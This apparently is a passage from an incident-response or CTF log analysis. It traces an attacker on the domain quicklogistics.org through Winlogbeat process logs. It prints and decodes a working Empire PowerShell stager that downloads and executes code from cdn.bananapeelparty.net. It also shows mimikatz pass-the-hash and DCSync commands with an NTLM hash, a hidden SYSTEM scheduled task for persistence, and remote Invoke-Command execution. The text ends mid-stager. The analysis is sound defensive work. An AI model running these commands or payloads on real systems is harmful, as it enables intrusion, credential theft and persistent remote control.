2023-08-30T01:40:38.808Z allan.smith 6320 2780 "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAfQA7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoARQB4AHAAZQBjAHQAMQAwADAAQwBvAG4AdABpAG4AdQBlAD0AMAA7ACQAdwBjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHMAZQByAD0AJAAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBqAEEARwBRAEEAYgBnAEEAdQBBAEcASQBBAFkAUQBCAHUAQQBHAEUAQQBiAGcAQgBoAEEASABBAEEAWgBRAEIAbABBAEcAdwBBAGMAQQBCAGgAQQBIAEkAQQBkAEEAQgA1AEEAQwA0AEEAYgBnAEIAbABBAEgAUQBBAE8AZwBBADQAQQBEAEEAQQAnACkAKQApADsAJAB0AD0AJwAvAGEAZABtAGkAbgAvAGcAZQB0AC4AcABoAHAAJwA7ACQAdwBjAC4ASABlAGEAZABlAHIAcwAuAEEAZABkACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAkAHUAKQA7ACQAdwBjAC4AUAByAG8AeAB5AD0AWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBEAGUAZgBhAHUAbAB0AFcAZQBiAFAAcgBvAHgAeQA7ACQAdwBjAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQATgBlAHQAdwBvAHIAawBDAHIAZQBkAGUAbgB0AGkAYQBsAHMAOwAkAFMAYwByAGkAcAB0ADoAUAByAG8AeAB5ACAAPQAgACQAdwBjAC4AUAByAG8AeAB5ADsAJABLAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAQgB5AHQAZQBzACgAJwB9AHcAUwAxACYAVgBOAHEAbwBJAFkAKgBHACMANQAtAFAAbAB2AHsAcAAyAGYAPQA0AFoAPwB1AGEAdABAADwAJwApADsAJABSAD0AewAkAEQALAAkAEsAPQAkAEEAcgBnAHMAOwAkAFMAPQAwAC4ALgAyADUANQA7ADAALgAuADIANQA1AHwAJQB7ACQASgA9ACgAJABKACsAJABTAFsAJABfAF0AKwAkAEsAWwAkAF8AJQAkAEsALgBDAG8AdQBuAHQAXQApACUAMgA1ADYAOwAkAFMAWwAkAF8AXQAsACQAUwBbACQASgBdAD0AJABTAFsAJABKAF0ALAAkAFMAWwAkAF8AXQB9ADsAJABEAHwAJQB7ACQASQA9ACgAJABJACsAMQApACUAMgA1ADYAOwAkAEgAPQAoACQASAArACQAUwBbACQASQBdACkAJQAyADUANgA7ACQAUwBbACQASQBdACwAJABTAFsAJABIAF0APQAkAFMAWwAkAEgAXQAsACQAUwBbACQASQBdADsAJABfAC0AYgB4AG8AcgAkAFMAWwAoACQAUwBbACQASQBdACsAJABTAFsAJABIAF0AKQAlADIANQA2AF0AfQB9ADsAJAB3AGMALgBIAGUAYQBkAGUAcgBzAC4AQQBkAGQAKAAiAEMAbwBvAGsAaQBlACIALAAiAHIAbABrAEgAVgBYAFcAYgBiAD0AMQAzAGMAZgBjAG8AOQByAFUAWAB4ADAAaQA0AEoAMwB4AFQAdQA2ADgAMgBKAEYAaQBYADAAPQAiACkAOwAkAGQAYQB0AGEAPQAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJABzAGUAcgArACQAdAApADsAJABpAHYAPQAkAGQAYQB0AGEAWwAwAC4ALgAzAF0AOwAkAGQAYQB0AGEAPQAkAGQAYQB0AGEAWwA0AC4ALgAkAGQAYQB0AGEALgBsAGUAbgBnAHQAaABdADsALQBqAG8AaQBuAFsAQwBoAGEAcgBbAF0AXQAoACYAIAAkAFIAIAAkAGQAYQB0AGEAIAAoACQASQBWACsAJABLACkAKQB8AEkARQBYAA==
$ curl -d "$(cat query.json)" -H 'Content-Type: application/json' -s http://elastic:elastic@10.10.241.17:9200/winlogbeat-7.17.6-2023.08.29-000001/_search?size=3000 | jq -c '.hits.hits[]."_source"' | grep command_line | jq -r '"\(."@timestamp") \(.user.name)\t\(.process.pid)\t\(.process.parent.pid)\t\(.process.command_line)"' | sort | grep 6320
2023-08-30T01:40:38.808Z allan.smith 6320 2780 "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAfQA7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoARQB4AHAAZQBjAHQAMQAwADAAQwBvAG4AdABpAG4AdQBlAD0AMAA7ACQAdwBjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHMAZQByAD0AJAAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBqAEEARwBRAEEAYgBnAEEAdQBBAEcASQBBAFkAUQBCAHUAQQBHAEUAQQBiAGcAQgBoAEEASABBAEEAWgBRAEIAbABBAEcAdwBBAGMAQQBCAGgAQQBIAEkAQQBkAEEAQgA1AEEAQwA0AEEAYgBnAEIAbABBAEgAUQBBAE8AZwBBADQAQQBEAEEAQQAnACkAKQApADsAJAB0AD0AJwAvAGEAZABtAGkAbgAvAGcAZQB0AC4AcABoAHAAJwA7ACQAdwBjAC4ASABlAGEAZABlAHIAcwAuAEEAZABkACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAkAHUAKQA7ACQAdwBjAC4AUAByAG8AeAB5AD0AWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBEAGUAZgBhAHUAbAB0AFcAZQBiAFAAcgBvAHgAeQA7ACQAdwBjAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQATgBlAHQAdwBvAHIAawBDAHIAZQBkAGUAbgB0AGkAYQBsAHMAOwAkAFMAYwByAGkAcAB0ADoAUAByAG8AeAB5ACAAPQAgACQAdwBjAC4AUAByAG8AeAB5ADsAJABLAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAQgB5AHQAZQBzACgAJwB9AHcAUwAxACYAVgBOAHEAbwBJAFkAKgBHACMANQAtAFAAbAB2AHsAcAAyAGYAPQA0AFoAPwB1AGEAdABAADwAJwApADsAJABSAD0AewAkAEQALAAkAEsAPQAkAEEAcgBnAHMAOwAkAFMAPQAwAC4ALgAyADUANQA7ADAALgAuADIANQA1AHwAJQB7ACQASgA9ACgAJABKACsAJABTAFsAJABfAF0AKwAkAEsAWwAkAF8AJQAkAEsALgBDAG8AdQBuAHQAXQApACUAMgA1ADYAOwAkAFMAWwAkAF8AXQAsACQAUwBbACQASgBdAD0AJABTAFsAJABKAF0ALAAkAFMAWwAkAF8AXQB9ADsAJABEAHwAJQB7ACQASQA9ACgAJABJACsAMQApACUAMgA1ADYAOwAkAEgAPQAoACQASAArACQAUwBbACQASQBdACkAJQAyADUANgA7ACQAUwBbACQASQBdACwAJABTAFsAJABIAF0APQAkAFMAWwAkAEgAXQAsACQAUwBbACQASQBdADsAJABfAC0AYgB4AG8AcgAkAFMAWwAoACQAUwBbACQASQBdACsAJABTAFsAJABIAF0AKQAlADIANQA2AF0AfQB9ADsAJAB3AGMALgBIAGUAYQBkAGUAcgBzAC4AQQBkAGQAKAAiAEMAbwBvAGsAaQBlACIALAAiAHIAbABrAEgAVgBYAFcAYgBiAD0AMQAzAGMAZgBjAG8AOQByAFUAWAB4ADAAaQA0AEoAMwB4AFQAdQA2ADgAMgBKAEYAaQBYADAAPQAiACkAOwAkAGQAYQB0AGEAPQAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJABzAGUAcgArACQAdAApADsAJABpAHYAPQAkAGQAYQB0AGEAWwAwAC4ALgAzAF0AOwAkAGQAYQB0AGEAPQAkAGQAYQB0AGEAWwA0AC4ALgAkAGQAYQB0AGEALgBsAGUAbgBnAHQAaABdADsALQBqAG8AaQBuAFsAQwBoAGEAcgBbAF0AXQAoACYAIAAkAFIAIAAkAGQAYQB0AGEAIAAoACQASQBWACsAJABLACkAKQB8AEkARQBYAA==
2023-08-30T01:41:34.991Z allan.smith 5756 6320 "C:\Users\allan.smith\Documents\mimi\x64\mimikatz.exe" "sekurlsa::pth /user:administrator /domain:quicklogistics.org /ntlm:00f80f2538dcb54e7adc715c0e7091ec /run:powershell.exe" exit
2023-08-30T01:42:47.600Z allan.smith 4276 6320 "C:\Windows\system32\schtasks.exe" /Create /F /RU system /SC ONIDLE /I 2 /TN Updater /TR "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NonI -W hidden -c \"IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp HKLM:\Software\Microsoft\Network debug).debug)))\""
2023-08-30T01:43:36.715Z allan.smith 4464 6320 "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "Invoke-Command -ScriptBlock {hostname} -ComputerName DC01.quicklogistics.org"
2023-08-30T01:43:45.614Z allan.smith 3100 6320 "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "Invoke-Command -ScriptBlock {hostname}"
2023-08-30T01:43:57.673Z allan.smith 5096 6320 "C:\Users\allan.smith\Documents\mimi\x64\mimikatz.exe" "sekurlsa::pth /user:administrator /domain:quicklogistics.org /ntlm:00f80f2538dcb54e7adc715c0e7091ec /run:powershell.exe" exit
2023-08-30T01:45:12.695Z allan.smith 5156 6320 "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "Invoke-Command -ScriptBlock {hostname} -ComputerName DC01.quicklogistics.org"
Confirming the remote executions on DC01
via Invoke-Command
, everything went through even including an Empire stager:
$ curl -d "$(cat query.json)" -H 'Content-Type: application/json' -s http://elastic:elastic@10.10.81.59:9200/winlogbeat-7.17.6-2023.08.29-000001/_search?size=3000 | jq -c '.hits.hits[]."_source"' | grep command_line | jq -r '"\(."@timestamp") \(.user.name)@\(.host.hostname)\t\(.process.pid)\t\(.process.parent.pid)\t\(.process.command_line)"' | sort | grep DC01
2023-08-29T23:50:11.566Z Administrator@DC01 2656 5944 "C:\Windows\system32\sc.exe" start winlogbeat
2023-08-30T01:45:02.538Z Administrator@DC01 6644 1000 C:\Windows\system32\wsmprovhost.exe -Embedding
2023-08-30T01:45:03.836Z Administrator@DC01 2556 6644 "C:\Windows\system32\HOSTNAME.EXE"
2023-08-30T01:45:19.418Z Administrator@DC01 7152 1000 C:\Windows\system32\wsmprovhost.exe -Embedding
2023-08-30T01:45:19.629Z Administrator@DC01 6212 7152 "C:\Windows\system32\HOSTNAME.EXE"
2023-08-30T01:45:41.086Z Administrator@DC01 5292 1000 C:\Windows\system32\wsmprovhost.exe -Embedding
2023-08-30T01:45:41.297Z Administrator@DC01 4008 5292 "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAfQA7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoARQB4AHAAZQBjAHQAMQAwADAAQwBvAG4AdABpAG4AdQBlAD0AMAA7ACQAdwBjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHMAZQByAD0AJAAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBqAEEARwBRAEEAYgBnAEEAdQBBAEcASQBBAFkAUQBCAHUAQQBHAEUAQQBiAGcAQgBoAEEASABBAEEAWgBRAEIAbABBAEcAdwBBAGMAQQBCAGgAQQBIAEkAQQBkAEEAQgA1AEEAQwA0AEEAYgBnAEIAbABBAEgAUQBBAE8AZwBBADQAQQBEAEEAQQAnACkAKQApADsAJAB0AD0AJwAvAGEAZABtAGkAbgAvAGcAZQB0AC4AcABoAHAAJwA7ACQAdwBjAC4ASABlAGEAZABlAHIAcwAuAEEAZABkACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAkAHUAKQA7ACQAdwBjAC4AUAByAG8AeAB5AD0AWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBEAGUAZgBhAHUAbAB0AFcAZQBiAFAAcgBvAHgAeQA7ACQAdwBjAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQATgBlAHQAdwBvAHIAawBDAHIAZQBkAGUAbgB0AGkAYQBsAHMAOwAkAFMAYwByAGkAcAB0ADoAUAByAG8AeAB5ACAAPQAgACQAdwBjAC4AUAByAG8AeAB5ADsAJABLAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAQgB5AHQAZQBzACgAJwB9AHcAUwAxACYAVgBOAHEAbwBJAFkAKgBHACMANQAtAFAAbAB2AHsAcAAyAGYAPQA0AFoAPwB1AGEAdABAADwAJwApADsAJABSAD0AewAkAEQALAAkAEsAPQAkAEEAcgBnAHMAOwAkAFMAPQAwAC4ALgAyADUANQA7ADAALgAuADIANQA1AHwAJQB7ACQASgA9ACgAJABKACsAJABTAFsAJABfAF0AKwAkAEsAWwAkAF8AJQAkAEsALgBDAG8AdQBuAHQAXQApACUAMgA1ADYAOwAkAFMAWwAkAF8AXQAsACQAUwBbACQASgBdAD0AJABTAFsAJABKAF0ALAAkAFMAWwAkAF8AXQB9ADsAJABEAHwAJQB7ACQASQA9ACgAJABJACsAMQApACUAMgA1ADYAOwAkAEgAPQAoACQASAArACQAUwBbACQASQBdACkAJQAyADUANgA7ACQAUwBbACQASQBdACwAJABTAFsAJABIAF0APQAkAFMAWwAkAEgAXQAsACQAUwBbACQASQBdADsAJABfAC0AYgB4AG8AcgAkAFMAWwAoACQAUwBbACQASQBdACsAJABTAFsAJABIAF0AKQAlADIANQA2AF0AfQB9ADsAJAB3AGMALgBIAGUAYQBkAGUAcgBzAC4AQQBkAGQAKAAiAEMAbwBvAGsAaQBlACIALAAiAHIAbABrAEgAVgBYAFcAYgBiAD0AMQAzAGMAZgBjAG8AOQByAFUAWAB4ADAAaQA0AEoAMwB4AFQAdQA2ADgAMgBKAEYAaQBYADAAPQAiACkAOwAkAGQAYQB0AGEAPQAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJABzAGUAcgArACQAdAApADsAJABpAHYAPQAkAGQAYQB0AGEAWwAwAC4ALgAzAF0AOwAkAGQAYQB0AGEAPQAkAGQAYQB0AGEAWwA0AC4ALgAkAGQAYQB0AGEALgBsAGUAbgBnAHQAaABdADsALQBqAG8AaQBuAFsAQwBoAGEAcgBbAF0AXQAoACYAIAAkAFIAIAAkAGQAYQB0AGEAIAAoACQASQBWACsAJABLACkAKQB8AEkARQBYAA==
$ echo "SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAfQA7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoARQB4AHAAZQBjAHQAMQAwADAAQwBvAG4AdABpAG4AdQBlAD0AMAA7ACQAdwBjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHMAZQByAD0AJAAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBqAEEARwBRAEEAYgBnAEEAdQBBAEcASQBBAFkAUQBCAHUAQQBHAEUAQQBiAGcAQgBoAEEASABBAEEAWgBRAEIAbABBAEcAdwBBAGMAQQBCAGgAQQBIAEkAQQBkAEEAQgA1AEEAQwA0AEEAYgBnAEIAbABBAEgAUQBBAE8AZwBBADQAQQBEAEEAQQAnACkAKQApADsAJAB0AD0AJwAvAGEAZABtAGkAbgAvAGcAZQB0AC4AcABoAHAAJwA7ACQAdwBjAC4ASABlAGEAZABlAHIAcwAuAEEAZABkACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAkAHUAKQA7ACQAdwBjAC4AUAByAG8AeAB5AD0AWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBEAGUAZgBhAHUAbAB0AFcAZQBiAFAAcgBvAHgAeQA7ACQAdwBjAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQATgBlAHQAdwBvAHIAawBDAHIAZQBkAGUAbgB0AGkAYQBsAHMAOwAkAFMAYwByAGkAcAB0ADoAUAByAG8AeAB5ACAAPQAgACQAdwBjAC4AUAByAG8AeAB5ADsAJABLAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAQgB5AHQAZQBzACgAJwB9AHcAUwAxACYAVgBOAHEAbwBJAFkAKgBHACMANQAtAFAAbAB2AHsAcAAyAGYAPQA0AFoAPwB1AGEAdABAADwAJwApADsAJABSAD0AewAkAEQALAAkAEsAPQAkAEEAcgBnAHMAOwAkAFMAPQAwAC4ALgAyADUANQA7ADAALgAuADIANQA1AHwAJQB7ACQASgA9ACgAJABKACsAJABTAFsAJABfAF0AKwAkAEsAWwAkAF8AJQAkAEsALgBDAG8AdQBuAHQAXQApACUAMgA1ADYAOwAkAFMAWwAkAF8AXQAsACQAUwBbACQASgBdAD0AJABTAFsAJABKAF0ALAAkAFMAWwAkAF8AXQB9ADsAJABEAHwAJQB7ACQASQA9ACgAJABJACsAMQApACUAMgA1ADYAOwAkAEgAPQAoACQASAArACQAUwBbACQASQBdACkAJQAyADUANgA7ACQAUwBbACQASQBdACwAJABTAFsAJABIAF0APQAkAFMAWwAkAEgAXQAsACQAUwBbACQASQBdADsAJABfAC0AYgB4AG8AcgAkAFMAWwAoACQAUwBbACQASQBdACsAJABTAFsAJABIAF0AKQAlADIANQA2AF0AfQB9ADsAJAB3AGMALgBIAGUAYQBkAGUAcgBzAC4AQQBkAGQAKAAiAEMAbwBvAGsAaQBlACIALAAiAHIAbABrAEgAVgBYAFcAYgBiAD0AMQAzAGMAZgBjAG8AOQByAFUAWAB4ADAAaQA0AEoAMwB4AFQAdQA2ADgAMgBKAEYAaQBYADAAPQAiACkAOwAkAGQAYQB0AGEAPQAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJABzAGUAcgArACQAdAApADsAJABpAHYAPQAkAGQAYQB0AGEAWwAwAC4ALgAzAF0AOwAkAGQAYQB0AGEAPQAkAGQAYQB0AGEAWwA0AC4ALgAkAGQAYQB0AGEALgBsAGUAbgBnAHQAaABdADsALQBqAG8AaQBuAFsAQwBoAGEAcgBbAF0AXQAoACYAIAAkAFIAIAAkAGQAYQB0AGEAIAAoACQASQBWACsAJABLACkAKQB8AEkARQBYAA==" | base64 -d
If($PSVersionTable.PSVersion.Major -ge 3){};[System.Net.ServicePointManager]::Expect100Continue=0;$wc=New-Object System.Net.WebClient;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';$ser=$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('aAB0AHQAcAA6AC8ALwBjAGQAbgAuAGIAYQBuAGEAbgBhAHAAZQBlAGwAcABhAHIAdAB5AC4AbgBlAHQAOgA4ADAA')));$t='/admin/get.php';$wc.Headers.Add('User-Agent',$u);$wc.Proxy=[System.Net.WebRequest]::DefaultWebProxy;$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;$Script:Proxy = $wc.Proxy;$K=[System.Text.Encoding]::ASCII.GetBytes('}wS1&VNqoIY*G#5-Plv{p2f=4Z?uat@<');$R={$D,$K=$Args;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.Count])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bxor$S[($S[$I]+$S[$H])%256]}};$wc.Headers.Add("Cookie","rlkHVXWbb=13cfco9rUXx0i4J3xTu682JFiX0=");$data=$wc.DownloadData($ser+$t);$iv=$data[0..3];$data=$data[4..$data.length];-join[Char[]](& $R $data ($IV+$K))|IEX
$ echo "aAB0AHQAcAA6AC8ALwBjAGQAbgAuAGIAYQBuAGEAbgBhAHAAZQBlAGwAcABhAHIAdAB5AC4AbgBlAHQAOgA4ADAA" | base64 -d
http://cdn.bananapeelparty.net:80
The attacker performed a DCSync attack via mimikatz.exe
on another Domain Administrator, backupda
:
$ curl -d "$(cat query.json)" -H 'Content-Type: application/json' -s http://elastic:elastic@10.10.81.59:9200/winlogbeat-7.17.6-2023.08.29-000001/_search?size=3000 | jq -c '.hits.hits[]."_source"' | grep command_line | jq -r '"\(."@timestamp") \(.user.name)@\(.host.hostname)\t\(.process.pid)\t\(.process.parent.pid)\t\(.process.command_line)"' | sort | grep DC01 | grep 4008
2023-08-30T01:46:18.577Z Administrator@DC01 5936 4008 "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "iwr https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20220919/mimikatz_trunk.zip -outfile mimi.zip"
2023-08-30T01:46:32.376Z Administrator@DC01 4164 4008 "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "Expand-Archive mimi.zip"
2023-08-30T01:47:34.171Z Administrator@DC01 4980 4008 "C:\Windows\system32\net.exe" localgroup administrators
2023-08-30T01:47:57.809Z Administrator@DC01 6800 4008 "C:\Users\Administrator\Documents\mimi\x64\mimikatz.exe" "lsadump::dcsync /domain:quicklogistics.org /user:backupda" exit
2023-08-30T01:48:04.117Z Administrator@DC01 2560 4008 "C:\Users\Administrator\Documents\mimi\x64\mimikatz.exe" "lsadump::dcsync /domain:quicklogistics.org /user:administrator" exit
A callback to the Empire C2 was then established using the Domain Administrator account on both WKSTN-0051
and WKSTN-1327
:
$ curl -d "$(cat query.json)" -H 'Content-Type: application/json' -s http://elastic:elastic@10.10.81.59:9200/winlogbeat-7.17.6-2023.08.29-000001/_search?size=3000 | jq -c '.hits.hits[]."_source"' | grep command_line | jq -r '"\(."@timestamp") \(.user.name)@\(.host.hostname)\t\(.process.pid)\t\(.process.parent.pid)\t\(.process.command_line)"' | sort | grep WKSTN-0051
2023-08-30T02:06:09.872Z Administrator@WKSTN-0051 8324 5004 "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "Invoke-Command -ComputerName WKSTN-0051.quicklogistics.org -ScriptBlock {powershell -enc SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAfQA7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoARQB4AHAAZQBjAHQAMQAwADAAQwBvAG4AdABpAG4AdQBlAD0AMAA7ACQAdwBjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHMAZQByAD0AJAAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBqAEEARwBRAEEAYgBnAEEAdQBBAEcASQBBAFkAUQBCAHUAQQBHAEUAQQBiAGcAQgBoAEEASABBAEEAWgBRAEIAbABBAEcAdwBBAGMAQQBCAGgAQQBIAEkAQQBkAEEAQgA1AEEAQwA0AEEAYgBnAEIAbABBAEgAUQBBAE8AZwBBADQAQQBEAEEAQQAnACkAKQApADsAJAB0AD0AJwAvAGEAZABtAGkAbgAvAGcAZQB0AC4AcABoAHAAJwA7ACQAdwBjAC4ASABlAGEAZABlAHIAcwAuAEEAZABkACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAkAHUAKQA7ACQAdwBjAC4AUAByAG8AeAB5AD